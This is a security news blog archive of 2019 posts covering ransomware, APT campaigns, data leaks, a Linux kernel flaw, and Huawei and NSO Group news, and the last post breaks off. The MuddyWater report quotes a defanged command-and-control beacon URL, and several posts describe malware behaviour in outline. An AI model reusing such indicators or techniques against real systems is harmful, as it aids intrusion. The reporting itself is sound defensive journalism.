Category Archives: information security news

Emsisoft released a free Decrypter for JSWorm 2.0

Good news for the victims of the JSWorm 2.0 ransomware, thanks to experts at Emsisoft they can decrypt their file for free.

Experts at Emsisoft malware research team released a decrypter for a recently discovered ransomware tracked as JSWorm 2.0.

JSWorm 2.0 is written in C++ and implements Blowfish encryption. The first version of the malware was written in C# and used the “.JSWORM” extension. Researchers believe both versions were developed by the same author.

Researchers found notable callouts in two different malware samples naming ID Ransomware and several prominent malware researchers:

“:HI SIRI, DEMONSLAY AND AMIIIIGO!!! HOW ARE YOU?”

and

“:ID-RANSOMWARE, IT’S JUST THE BEGINING [sic] OF SOMETHING NEW…”

Experts pointed out that there have been multiple confirmed submissions to the online service ID Ransomware that allows victims to upload their encrypted files to identify the ransomware that infected their machines. Since January 2019, experts observed encrypted files uploaded from South Africa, Italy, France, Iran, Vietnam, Argentina, United States, and other countries.

“Its files have the “.[ID-<numbers>][<email>].JSWORM” extension and the ransom note file named “JSWORM-DECRYPT.txt.”” reads the post published by Emsisoft.

Once infected a computer, the JSWorm 2.0 ransomware will perform the following actions:

  • Sets the “EnableLinkedConnections” registry key, which allows it to attack mapped drives when ran as admin.
  • Restarts SMB services (lanmanworkstation) to take effect (we are investigating if there’s more to the SMB vector).
  • Stops services for databases (MSSQL, MySQL, QuickBooks), kills shadow copies, disables recovery mode.

Victims of the JSWorm ransomware have to follow the instructions below to decrypt their files for free:

  1. Download the Emsisoft JSWorm 2.0 Decrypter.
  2. Run the executable and confirm the license agreement when asked.
  3. Click “Browse” and select the ransom note file on your computer.
  4. Click “Start” to decrypt your files. Note that this may take a while.
JSWorm decrypter

Done!

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – JSWorm 2.0. ransomware)

The post Emsisoft released a free Decrypter for JSWorm 2.0 appeared first on Security Affairs.

Group-IB blocked more than 180,000 links to pirated copies of Game of Thrones

Since April 2019, Group-IB has successfully blocked more than 43,000 links to pirated copies of the Game of Thrones Season 8 on pirate websites, forums, and social media

As the Game of Thrones saga came to a close (no spoilers here), Group-IB has summed up the results of its anti-piracy campaign during Season 8 of the Game of Thrones – one of the biggest franchises in the TV history. Since April 2019, when the final season premiered, Group-IB Anti-Piracy team has successfully blocked more than 43,000 links to pirated copies of the GOT Season 8 on pirate websites, forums, and social media. Group-IB’s Anti-Piracy team was brought in to protect Game of Thrones against online pirates back in 2015. Since that time, the company’s specialists have blocked more than 180,000 links to illegal copies of Game of Thrones in Russian.

The final GOT Season 8 premiered on 14 April and became one of the show’s most popular seasons not only among fans all over the world, but also among online pirates. Group-IB’s Anti-Piracy team discovered and blocked 43,711 links to pirated Season 8 episodes in Russian. Illegal copies surfaced on pirate websites, forums, and social media. Pirated copies of the GOT Season 8 episodes were spotted on 1,098 different websites, 94 of which were designed exclusively for the distribution of pirated GOT copies.

More than 30,000 unique links to pirated GOT episodes have been removed from the search results of the Russian search engine Yandex. In response to the blocking, online pirates struck back by creating mirrors on a daily basis – copies of their websites with new but very similar domain names. For instance, one of the pirates created more than 20 mirrors on their subdomains. However, according to the pirates’ forum posts, the owners of pirate websites were not ready for the “attack” on them: “Looks like somebody just wiped the links out. Some of the pages disappeared… some of them do not appear in search results”. It is also interesting that some of the groups on VK.com, a Russian social network, removed pirated episodes after receiving complaints and turned into GOT fan pages.

The streaming service Amediateka holds exclusive distribution rights for the Game of Thrones in Russia and since April 2015, when Season 5 premiered, has used the services of Group-IB to fight online pirates distributing illegal copies of the GOT in Russian. Season after season, online pirates’ interest in the show has only been increasing. For example, while Season 5 was broadcast, Group-IB’s Anti-Piracy team detected and removed 2,067 links to illegal copies. Season 7 saw an increase, reaching 12,540 links to pirated episodes detected and blocked. Season 8 set a record of 43,711 links. For the past 4 years, Group-IB detected and blocked more than 180,000 links, including links detected and blocked between the seasons’ airings.

Game of Thrones Season 8

GOT is not the only Amediateka’s show that Group-IB’s Anti-Piracy team protects, but it turned out to be pirates’ favorite one. Pirates’ other top targets include True Detective, with 23,473 pirated links detected and blocked, Billions (20,303 links), The Good Wife (14,541 links), and Westworld, with  12,229 links detected and blocked by Group-IB Anti-Piracy team.

“For us the battle against online pirates, trying to profit off the illegal distribution of the Game of Thrones in Russian, was as fierce as for George R.R. Martin’s characters,” commented Andrey Busargin, Director of Anti-Piracy and Brand Protection at Group-IB. “I would also like to highlight Amediateka’s commitment to counter online piracy in Russia: they brought in Group-IB Anti-Piracy team ahead of time and have been making continuous efforts to popularize legal viewership of the Game of Thrones making it available on its website, in movie theaters all over the country and even on the stadium.”

Group-IB‘s fight against digital piracy started in 2011, when the Anti-Piracy Department was established. Group-IB’s Anti-Piracy team uses unique machine-learning technologies applied in complex investigations of cyberattacks to detect pirate websites, find their owners and block illegal content. Group-IB’s Anti-Piracy system monitors 100,000+ resources in all languages ranging from torrent trackers and streaming services to social media groups and pirate platforms in the DarkNet. The average time to detect the first pirated copy on the Internet is 30 minutes. 80% of pirated links are successfully blocked by Group-IB team within 24 hours of their appearance on the Internet.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

About the author: Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection.

The report published by Group-IB is available here:

https://www.group-ib.com/resources/threat-research/js-sniffers.html

Pierluigi Paganini

(SecurityAffairs – piracy, Game of Thrones)

The post Group-IB blocked more than 180,000 links to pirated copies of Game of Thrones appeared first on Security Affairs.

After latest Microsoft Windows updates some PCs running Sophos AV not boot

Sophos is warning users of potential problems with the recent Microsoft’s Patch Tuesday updates and is saying to roll back it if they want the PC to boot.

The security firm has informed its customers of potential problems with the latest Microsoft’s Patch Tuesday updates and is asking them to uninstall the patch if they want the machine to boot.

This means that the machine could be exposed to cyber attacks that leverage the vulnerabilities addressed by Microsoft, including a Windows zero-day flaw and an RDS vulnerability that can be exploited to carry out WannaCry-like attack.

Sophos confirmed that the latest set of Windows updates are causing problems with the boot of computers running the popular Antivirus software.

“We have had a few customers reporting that following on from the Microsoft Windows 14th May patches they are experiencing a hang on boot where the machines appear to get stuck on “Configuring 30%”” reads a note published by the company.

Experts believe the problems could be caused by the incompatibility with the KB4499164 and KB4499175 Microsoft Patches released on May 14, 2019.

According to Sophos, the problems have been reported by customers running Windows 7 and Windows Server 2008 R2.

sophos

The experts suggest to remove Windows update by booting the system in Safe mode.

“Current reports indicate that removing the Windows update in Safe Mode allows computers to boot as normal.” continues the note.

“If you experience issues removing this in Safe Mode please set the “Sophos Anti-Virus” Service startup to be “Disabled” and then attempt to remove the update after coming out of Safe Mode.”

Sophos is currently working with Microsoft to investigate the issue and develop a fix.

Microsoft Patch Tuesday updates for May 2019 also addressed a remote code execution flaw in Remote Desktop Services (RDS). The flaw tracked as CVE-2019-0708 can be exploited by an unauthenticated attacker by connecting to the targeted system via the Remote Desktop Protocol (RDP) and sending specially crafted requests. Microsoft pointed out that this vulnerability could be exploited by malware with wormable capabilities. It could be triggered by an unautheticated attacker and without users interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

The problem faced by Sophos customers could very annoying for large businesses that deployed the Microsoft updates. One user commenting on a blog post published by Sophos wrote the following statement:

“We had to roll back some 300+ machines for clients around the US.”

Affected users that are not able to boot their machine have to contact the company and open a ticket with the tech support team.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Sophos, Microsoft)

The post After latest Microsoft Windows updates some PCs running Sophos AV not boot appeared first on Security Affairs.

MuddyWater BlackWater campaign used new anti-detection techniques

A recent MuddyWater campaign tracked as BlackWater shows that the APT group added new anti-detection techniques to its arsenal.

Security experts at Cisco Talos attributed the recently spotted campaign tracked as “BlackWater” to the MuddyWater APT group (aka SeedWorm and TEMP.Zagros). 

The researchers also pointed out that the cyber espionage group has been updating its tactics, techniques, and procedures (TTPs) by adding three distinct steps to their operations to avoid the detection.

The first MuddyWater campaign was observed in late 2017 when targeted entities in the Middle East.

The experts called the campaign ‘MuddyWater’ due to the confusion in attributing a wave of attacks that took place between February and October 2017 targeting entities in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States to date.

The group evolved over the years by adding new attack techniques to its arsenal.

In March 2018, experts at FireEye uncovered a massive phishing campaign conducted by the TEMP.Zagros group targeting Asia and Middle East regions from January 2018 to March 2018.

Attackers used weaponized documents typically having geopolitical themes, such as documents purporting to be from the National Assembly of Pakistan or the Institute for Development and Research in Banking Technology.

In June 2018, Trend Micro researchers discovered a new attack relying on weaponized Word documents and PowerShell scripts that appears related to the MuddyWater APT. The final payload delivered in the campaign is the PRB-BackdoorRAT, it was controlled by the command and control (C&C) server at outl00k[.]net.

This campaign aims at installing a PowerShell-based backdoor onto the victim’s machine for espionage purposes.

MuddyWater document

As part of the recent BlackWater campaign, the MuddyWater APT group leveraged an obfuscated Visual Basic for Applications (VBA) macro script to add a Run registry key and gain persistence.

Then the attackers used a PowerShell stager script masquerade as a red-teaming tool that would download a PowerShell-based Trojan from a C2 server.

The stager download from the C2 a component of the FruityC2 agent script, an open-source framework on GitHub, that uses to enumerate the host machine.

“This could allow the threat actor to monitor web logs and determine whether someone uninvolved in the campaign made a request to their server in an attempt to investigate the activity.” reads the analysis published by Talos group. “Once the enumeration commands would run, the agent would communicate with a different C2 and send back the data in the URL field. This would make host-based detection more difficult, as an easily identifiable “errors.txt” file would not be generated.”

The cyberspies also used to replace some variable strings in the more recent samples to avoid signature-based detection from Yara rules. 

Attackers used a document that once was opened, it prompted the user to enable the macro titled “BlackWater.bas”. They protected the macro with a password to prevent user to view it in Visual Basic. The “Blackwater.bas” macro was obfuscated using a substitution cipher whereby the characters are replaced by their corresponding integer. 

“This series of commands first sent a server hello message to the C2, followed by a subsequent hello message every 300 seconds. An example of this beacon is “hxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater”.” continues the analysis. “Notably, the trojanized document’s macro was also called “BlackWater,” and the value “BlackWater” was hard coded into the PowerShell script. Next, the script would enumerate the victim’s machine”

Experts conclude that even if the changes implemented by the threat actor were minimal, they were significant enough to avoid detection and to allow the group to continue to perform operations.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – MuddyWater, APT)

The post MuddyWater BlackWater campaign used new anti-detection techniques appeared first on Security Affairs.

US Commerce Department delays Huawei ban for 90 Days

US Commerce Department will delay 90 days before to apply the announced Huawei ban to avoid huge disruption of the operations.

During the weekend, the Reuters agency revealed in exclusive that Alphabet Inc’s Google has suspended some business with Huawei after Trump’s ban on the telco giant.

On Thursday, President Trump added Huawei Technologies to a trade blacklist, but on Friday, the U.S. Commerce Department said it was considering to debunk the decision on the company to “prevent the interruption of existing network operations and equipment”.

Now a Commerce Department filing confirmed that delay does not change the Trump’ ban, but gives a 90-days temporary license that will grant Huawei to continue doing business with American businesses.

The Temporary General License aims at preventing disruption to the operations of the company that could have a dramatic impact on mobile users and broadband network operators.

“The Temporary General License grants operators time to make other arrangements and (gives) the Department space to determine the appropriate long term measures for Americans and foreign telecommunications providers that currently rely on Huawei equipment for critical services,” said Secretary of Commerce Wilbur Ross.

“In short, this license will allow operations to continue for existing Huawei mobile phone users and rural broadband networks.”

Huawei ban

While the tech giant is in the middle of a heated debate, FiveEyes intelligence agencies believe the Huawei equipment for 5G infrastructure poses a “significant network security risk,” for this reason, they asked mobile companies to avoid using the equipment of the Chinese company.

The Chinese company has been founded by a former People’s Liberation Army official in 1987. The US was the first country that warned of the security risks associated with the usage of the products manufactured by the Chinese telecommunications giant.

US intelligence believes Huawei equipment is taitend with backdoors that could allow Chinese intelligence to spy on communications networks of rival countries.

In November, The Wall Street Journal reported that the US Government is urging its allies to exclude Huawei from critical infrastructure and 5G architectures.

The United States highlighted the risks for national security in case of adoption of Huawei equipment and is inviting internet providers and telco operators in allied countries to ban Huawei.

Chinese equipment is broadly adopted in many allied countries, including Germany, Italy an, Japan. Many countries are going to build 5G infrastructure, but the approach of their governments is completely different.

Now the US Commerce Department delayed the bad for 90 days. Experts believe that Huawei is only one of the Chinese companies that will face similar measures because could threaten the economic and technological leadership of the United States.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Huawei ban, China)

The post US Commerce Department delays Huawei ban for 90 Days appeared first on Security Affairs.

Data belonging to Instagram influencers and celebrities exposed online

A new data leak made the headlines, a database containing the contact information of millions of Instagram influencers, celebrities and brand accounts has been found online.

The news was first reported by the TechCrunch website, a database was left unprotected on an AWS bucket, anyone was able to access it without authentication.

instagram

The unprotected database was discovered by the security researcher Anurag Sen that immediately reported its discovery to TechCrunch in an effort to find the owner.

“A massive database containing contact information of millions of Instagram  influencers, celebrities and brand accounts has been found online.” states TechCrunch.

“At the time of writing, the database had over 49 million records — but was growing by the hour.”

The database contained public data scraped from influencer Instagram accounts, including their bio, profile picture, the number of followers, have, if they’re verified, their location by city and country, private contact information, the email address and phone number of the Instagram account owner.

Each record in the database also contained a field that calculated the worth of each account.

The list of influencers in the archive includes prominent food bloggers, celebrities and other social media influencers.

According to TechCrunch, the database belongs to India-based social media marketing firm Chtrbox, which pays influencers to post sponsored content on their accounts.

Strangely two people contacted by TechCrucnh that confirmed the authenticity of the data in the archive denied any involvement with Chtrbox.

“We contacted several people at random whose information was found in the database and provided them their phone numbers. Two of the people responded and confirmed their email address and phone number found in the database was used to set up their Instagram accounts.” continues the website. “Neither had any involvement with Chtrbox, they said.”

TechCrunch contacted Chtrbox that secured the database, but it is not clear how the company obtained those data.

Facebook, that currently owns Instagram, announced it is investigating the incident.

“We’re looking into the issue to understand if the data described – including email and phone numbers – was from Instagram or from other sources,” reads a statement from Facebook. “We’re also inquiring with Chtrbox to understand where this data came from and how it became publicly available,”

In 2017, a vulnerability in the Instagram application that allowed hackers to access information for high-profile users including phone numbers and email addresses of 6 million celebrities.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Instagram, data leak)

The post Data belonging to Instagram influencers and celebrities exposed online appeared first on Security Affairs.

Linux kernel privilege escalation flaw CVE-2019-11815 affects RDS

Experts discovered a privilege escalation vulnerability in the Linux Kernel, tracked as CVE-2019-11815, that affects the implementation of RDS over TCP.

Experts discovered a memory corruption vulnerability in Linux Kernel that resides in the implementation of the Reliable Datagram Sockets (RDS) over TCP.

The vulnerability tracked as CVE-2019-11815 could lead to privilege escalation, it received a CVSS base score of 8.1. The vulnerability only affects Linux kernels prior to 5.0.8, that use the Reliable Datagram Sockets (RDS) for the TCP module.

“An issue was discovered in rds_tcp_kill_sock in net/rds/tcp.c in the Linux kernel before 5.0.8. There is a race condition leading to a use-after-free, related to net namespace cleanup.” reads the security advisory published by the NIST.

The NIST classified the flaw as a race condition that affects the kernel’s rds_tcp_kill_sock in net/rds/tcp.c.. 

The vulnerability could be exploited by a remote attacker with no privileges over the network, the issue doesn’t require user interaction.

An attacker could exploit the vulnerability to access restricted information or trigger a denial of service condition. 

“A system that has the rds_tcp kernel module loaded (either through autoload via local process running listen(), or manual loading) could possibly cause a use after free (UAF) in which an attacker who is able to manipulate socket state while a network namespace is being torn down,” reads the advisory published by Red Hat.

According to a note included in the security advisory published by Canonical, there is no evidence that the bug is remotely exploitable. 

“I haven’t yet seen evidence to support allegations that this is remotely exploitable. Blacklisting rds.ko module is probably sufficient to prevent the vulnerable code from loading.” said Seth Arnold from the Ubuntu’s security team. “The default configuration of the kmod package has included RDS in /etc/modprobe.d/blacklist-rare-network.conf since 14.04 LTS. I’m dropping priority as a result.”

Both Suse and Debian also published security advisories for the
CVE-2019-11815 vulnerability.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Linux, CVE-2019-11815)

The post Linux kernel privilege escalation flaw CVE-2019-11815 affects RDS appeared first on Security Affairs.

Defiant Tech firm who operated LeakedSource pleads guilty

The Royal Canadian Mounted Police (RCMP), announced that the company behind LeakedSource, Defiant Tech Inc., pleads guilty in Canada.

Defiant Tech Inc., the company behind the LeakedSource.com website, pleaded guilty in Canada.

The LeakedSource website was launched in late 2015, in January 2017 the popular data breach notification website has been raided by feds.

It reported some of the largest data breaches, including the ones that affected Last.fmRambler.ruFriendFinder NetworksLinkedIn, and MySpace.

LeakedSource

In December 2017, the Canadian man Jordan Evan Bloom (27) was charged with data leak of 3 billion hacked accounts, the man was running a website to collect personal data and login credentials from the victims.

The man was charged as part of an investigation dubbed “Project Adoration,” aiming at trafficking in personal data, unauthorized use of computers, and possession of an illicitly obtained property.

The RCMP alleges that Bloom was the administrators of the LeakedSource.com website that operated through his company Defiant Tech.

LeakedSource offered for sale access to data gathered data from the victims of security breaches, sometimes buying it from hackers.

For $2 a day, a subscriber at LeakedSource, had the possibility to obtain the details on individuals by entering his email address or username. LeakedSource was also cracking the associated passwords when it was possible. The website was very popular among the users of the HackForums.net.

“A guilty plea was entered in court today by Defiant Tech Inc., to the charges of Trafficking In Identity Information and Possession of Property Obtained By Crime a year and a half after charges were laid into the RCMP’s cybercrime investigation dubbed Project “Adoration”. ” reads the press release published by RCMP.

“LeakedSource.com had a database of approximately three billion personal identity records and associated passwords that could be purchased for a small fee. Defiant Tech Inc. was operating the LeakedSource.com website and the company earned approximately $247,000 from trafficking identity information. “

The arrest of Bloom is the result of a joint effort of Canadian authorities, FBI and Dutch National Police.

According to the Royal Canadian Mounted Police, Defiant Tech made around CAN$247,000 (US$183,000) from his illegal activities.

“We are pleased with this latest development,” said Superintendent Mike Maclean, Officer in Charge Criminal Operations of the RCMP National Division. “I am immensely proud of this outcome as combatting cybercrime is an operational priority for us.”

According to the experts, Bloom didn’t operate the website alone, at least another US citizen was involved, but none was charged for this.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – cybercrime, LeakedSource)

The post Defiant Tech firm who operated LeakedSource pleads guilty appeared first on Security Affairs.

Chronicle experts spotted a Linux variant of the Winnti backdoor

Security researchers from Chronicle, Alphabet’s cyber-security division, have spotted a Linux variant of the Winnti backdoor.

Security experts from Chronicle, the Alphabet’s cyber-security division, have discovered a Linux variant of the Winnti backdoor. It is the first time that researchers found a Linux version of the backdoor user by China-linked APT groups tacked as Winnti.

chinese hackers

The experts believe that under the Winnti umbrella there are several APT groups, including  Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEADPassCV, Wicked Panda, and ShadowPad. The groups show similar tactics, techniques, and Procedures (TTPs) and in some cases shared portions of the same hacking infrastructure.

Chronicle researchers while investigating the cyber attack that hit the Bayer pharmaceutical company in April.

Searching for samples of Winnti malware on its VirusTotal platform, the experts discovered a Linux variant of Winnti, dating back to 2015. At the time the malware was used in the hack of a Vietnamese gaming company.

“In April 2019, reports emerged of an intrusion involving Winnti malware at a German Pharmaceutical company.” reads the analysis published by
Chronicle. “Analysis of these larger convoluted clusters is ongoing. While reviewing a 2015 report of a Winnti intrusion at a Vietnamese gaming company, we identified a small cluster of Winnti⁶ samples designed specifically for Linux.” 

The technical analysis of the Linux version of Winnti backdoor revealed the presence of two files, the main backdoor (libxselinux) and a library (libxselinux.so) used to avoid the detection.

The Winnti backdoor has a modular structure, it implements distinct functionalities using plugins. During the analysis, the researchers were unable to recover any active plugins. Experts believe attackers used additional modules for Linux to implement plugins for remote command execution, file exfiltration, and socks5 proxying on the infected host.

Further analysis revealed many code similarities between the Linux version of the Winnti variant and the Winnti 2.0 Windows version.

“The decoded configuration is similar in structure to the version Kaspersky classifies as Winnti 2.0, as well as samples in the 2015 Novetta report.” continues the report. “Embedded in this sample’s configuration three command-and-control server addresses and two additional strings we believe to be campaign designators. Winnti ver. 1, these values were designated as ‘tag’ and ‘group’. “

Like Windows variants of the Winnti backdoor, the Linux version also handles outbound communications using multiple protocols including ICMP, HTTP, as well as custom TCP and UDP protocols.

The Linux version also implements another feature that allows threat actors to initiate connections to infected hosts without requiring a connection to a control server.

The feature could allow attackers to directly access infected systems when access to the hard-coded control servers is disrupted.

“This secondary communication channel may be used by operators when access to the hard-coded control servers is disrupted. Additionally, the operators could leverage this feature when infecting internet-facing devices in a targeted organization to allow them to reenter a network if evicted from internal hosts.” continues the report. “This passive implant approach to network persistence has been previously observed with threat actors like Project Sauron and the Lamberts.”

In 2016, the Winniti hackers also hit German heavy industry giant ThyssenKrupp to steal company secrets.

Technical information about the above feature was also shared by the Thyssenkrupp CERT, its experts released a Nmap script that could be used to identify Winnti infections through network scanning.

“An expansion into Linux tooling indicates iteration outside of their traditionalcomfort zone. This may indicate the OS requirements of their intended targets but it may also be an attempt to take advantage of a security telemitry blindspot in many enterprises, as is with Penquin Turla and APT28’s Linux XAgent variant.” concludes the report that includes IoCs and Yara rules for the identification of the threat.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Winnti, Linux malware)

The post Chronicle experts spotted a Linux variant of the Winnti backdoor appeared first on Security Affairs.

Google will block Huawei from using Android and its services

The Reuters agency revealed in exclusive that Alphabet Inc’s Google has suspended some business with Huawei after Trump’s ban on the telco giant.

The news a bomb, Google has suspended some business with Huawei after Trump’s ban on the Chinese telco giant.

In November, The Wall Street Journal reported that the US Government is urging its allies to exclude Huawei from critical infrastructure and 5G architectures.

The United States is highlighting the risks for national security in case of adoption of Huawei equipment and is inviting internet providers and telco operators in allied countries to ban Huawei.

Huawei Dutch intelligence

The decision is a blow to the Huawei and has a significant impact on its strategy.

Just on Thursday, President Trump added Huawei Technologies to a trade blacklist, but on Friday, the U.S. Commerce Department said it was considering to debunk the decision on the company to “prevent the interruption of existing network operations and equipment”.

“Alphabet Inc’s Google has suspended business with Huawei that requires the transfer of hardware, software and technical services except those publicly available via open source licensing.” reported the Reuters.

Google explained that there will be no impact on current owners of Huawei devices running Google software because they will continue to receive updates provided by the US firm.

“We are complying with the order and reviewing the implications,” said a Google spokesperson.

“For users of our services, Google Play and the security protections from Google Play Protect will continue to function on existing Huawei devices,”

Of course, the decision will disrupt the commercial activity of Chinese telco firm outside China. Everyone will buy a Huawei device will have no access to updates to Google Android and will have no access to Google services, including the Google Play Store and Gmail and YouTube apps.

Google confirmed that Huawei will only be able to use the public version of Android (Android Open Source Project (AOSP)), but the users of the Chinese giant will not be able to get access to proprietary apps and services from Google.

The Google decision could make it impossible for the Chinese company to sell its devices abroad and other companies could interrupt any trade with the company fearing repercussions.

Intel Corp, Qualcomm Inc, Xilinx Inc, and Broadcom Inc have already announced that they will not supply critical software and components to Huawei until further notice.

Is the Chinese giant ready to face this earthquake?

According to the company, it is already working to develop its own technology fearing a total block from US companies.

“Huawei has said it has spent the last few years preparing a contingency plan by developing its own technology in case it is blocked from using Android. Some of this technology is already being used in products sold in China, the company has said.” reported the Reuters.

“No matter what happens, the Android Community does not have any legal right to block any company from accessing its open-source license,”
March, Eric Xu, rotating chairman of Huawei, told to Reuters.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Android, Google)

The post Google will block Huawei from using Android and its services appeared first on Security Affairs.

Amnesty International filed a lawsuit against Israeli surveillance firm NSO

Amnesty International filed a lawsuit against Israeli surveillance firm NSO and fears its staff may be targeted by the company with its Pegasus spyware.

The name NSO Group made the headlines last week after the disclosure of the WhatsApp flaw exploited by the company to remotely install its surveillance software.

The Israeli firm is now facing a lawsuit backed by Amnesty International, but the non-governmental organization fears its staff may be under surveillance spyware delivered leveraging the WhatsApp issue.

The lawsuit was filed in Israel by about 50 members and supporters of the human rights group. The organization calls on the Israeli ministry of defence to ban the export of the Pegasus surveillance software developed by NSO Group.

“An affidavit from Amnesty is at the heart of the case, and concludes that “staff of Amnesty International have an ongoing and well-founded fear they may continue to be targeted and ultimately surveilled” after a hacking attempt last year.” reads the post published by The Guardian.

“The Israeli government’s Defence Export Controls Agency has failed to exercise proper oversight “despite serious allegations of abuse”, the affidavit claimed, adding: “Because of DECA’s inaction, NSO Group can continue to sell its software to governments known to target human rights defenders.””

Officially the sale of surveillance software is limited to authorized governments to support investigation of agencies on criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

In July, Citizen Lab collected evidence of attacks against 175 targets worldwide carried on with the NSO spyware. Citizen Lab uncovered other attacks against individuals in Qatar or Saudi, where the Israeli surveillance software is becoming very popular.

In August, an Amnesty International report confirmed that its experts identified a second human rights activist, in Saudi Arabia, who was targeted with the powerful spyware.

According to Joshua Franco, Amnesty’s head of technology and human rights, the trading of surveillance software is going out-of-control.

On August, the human rights group published a report that provides details on the attack against an employee at Amnesty International. The hackers attempted to compromise the mobile device of a staff member in early June by sending him a WhatsApp message about a protest in front of the Saudi Embassy in Washington.

surveillance Amnesty International NGO spyware

The organization added that such kind of attacks is becoming even more frequent, a growing number of Israeli surveillance software being used to spy on human rights operators and opposition figures in the Middle East and beyond.

Amnesty International traced the malicious link in the message to the surveillance network of the Israeli firm NSO Group.

The Guardian reported that NSO Group already faced many other lawsuits, such as the one backed by Omar Abdulaziz, a Saudi dissident based in Montreal. In December Abdulaziz filed a lawsuit in Israel in which he claimed that his phone was infected with the NSO spyware when he was in regular contact with the journalist Jamal Khashoggi.

In November, Snowden warned of abuse of surveillance software that also had a role in the murder of the Saudi Arabian journalist Jamal Khashoggi.

Khashoggi is believed to have been killed by Saudi Arabi’s agents, and the country has licensed NSO software in 2017, paying $55m for the technology.

NSO said it wants to demonstrate that it is not involved in any abuse of its technology, it prepared a report composed of 26 pages to reply to the accusations made by Amnesty and Citizen Lab.

It is curious that early 2019, a majority stake in NSO was acquired by the London based firm Novalpina Capital, founded by the banker and philanthropist Stephen Peel.

The Guardian reported an excerpt of the reply to Amnesty, signed by Peel, that states that in “almost all” the cases of complaints of human rights abuse raised, the alleged victim of hacking had not been a target or the government in question had acted with “due lawful authority”.

“We believe that the reality is different. We’ve seen them target human rights organisations and no evidence they’ve been able to effectively control governments when complaints have been raised.” replied Danna Ingleton, the deputy director of Amnesty’s technology division.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – NSO Group, Amnesty International)

The post Amnesty International filed a lawsuit against Israeli surveillance firm NSO appeared first on Security Affairs.

Security Affairs newsletter Round 214 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

https://www.surveymonkey.com/r/EUBloggerAwards2018

Hacking the ‘Unhackable eyeDisk USB stick
Security breach suffered by credit bureau Equifax has cost $1.4 Billion
Turkish Personal Data Protection Authority fined Facebook for Photo API bug
CVE-2019-11815 Remote Code Execution affects Linux Kernel prior to 5.0.8
Expert discovered how to brick all Samsung mobile phones
Facebook sues data analytics firm Rankwave over alleged data misuse
Over 10k+ GPS trackers could be abused to spy on individuals in the UK
Pacha Group declares war to rival crypto mining hacking groups
Reading the Yoroi Cyber Security Annual Report 2018
Malware Training Sets: FollowUP
Millions of computers powered by Intel chips are affected by MDS flaws
North Korea-linked ScarCruft APT adds Bluetooth Harvester to its arsenal
Thrangrycat flaw could allow compromising millions of Cisco devices
Unprotected DB exposed PII belonging to nearly 90% of Panama citizens
WhatsApp zero-day exploited in targeted attacks to deliver NSO spyware
Adobe patches over 80 flaws in Flash, Acrobat Reader, and Media Encoder
Microsoft Patch Tuesday addresses dangerous RDS flaw that opens to WannaCry-like attacks
SAP Security Patch Day for May 2019 fixes many missing authorization checks
Twitter inadvertently collected and shared iOS location data
A flaw in Google Titan Security Keys expose users to Bluetooth Attacks
A joint operation by international police dismantled GozNym gang
BlackTech espionage group exploited ASUS update process to deliver Plead Backdoor
Google ‘0Day In the Wild project tracks zero-days exploited in the Wild
Magecart hackers inject card Skimmer in Forbes Subscription Site
Microsoft renewed its Attack Surface Analyzer, version 2.0 is online
Past, present, and future of the Dark Web
The stealthy email stealer in the TA505 hacker groups arsenal
A flaw in Slack could allow hackers to steal, manipulate downloaded files
Chinese state-sponsored hackers breached TeamViewer in 2016
Cisco addressed a critical flaw in networks management tool Prime Infrastructure
Stack Overflow Q&A platform announced a data breach
XSS flaw in WordPress Live Chat Plugin lets attackers compromise WP sites
Dozens of Linksys router models leak data useful for hackers
Facebook banned Archimedes Group, misinformation made in Israel
Number of hacktivist attacks declined by 95 percent since 2015
Unistellar attackers already wiped over 12,000 MongoDB databases

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 214 – News of the week appeared first on Security Affairs.

Salesforce faced one of its biggest service disruption of ever

Salesforce is facing a huge outage, it shut down a good portion of its infrastructure due to change to the production environment.

A change in the production environment is the root cause of the broad outage suffered by Salesforce.

The service disruption affected its Pardot B2B marketing automation system, the cloud CRM company’s change broke access privileges settings across organizations and gave customers access to all of their respective company’s files.

“One of our projects had all its profiles modified to enable modify all, allowing all users access to all data.” reported a user on Reddit.

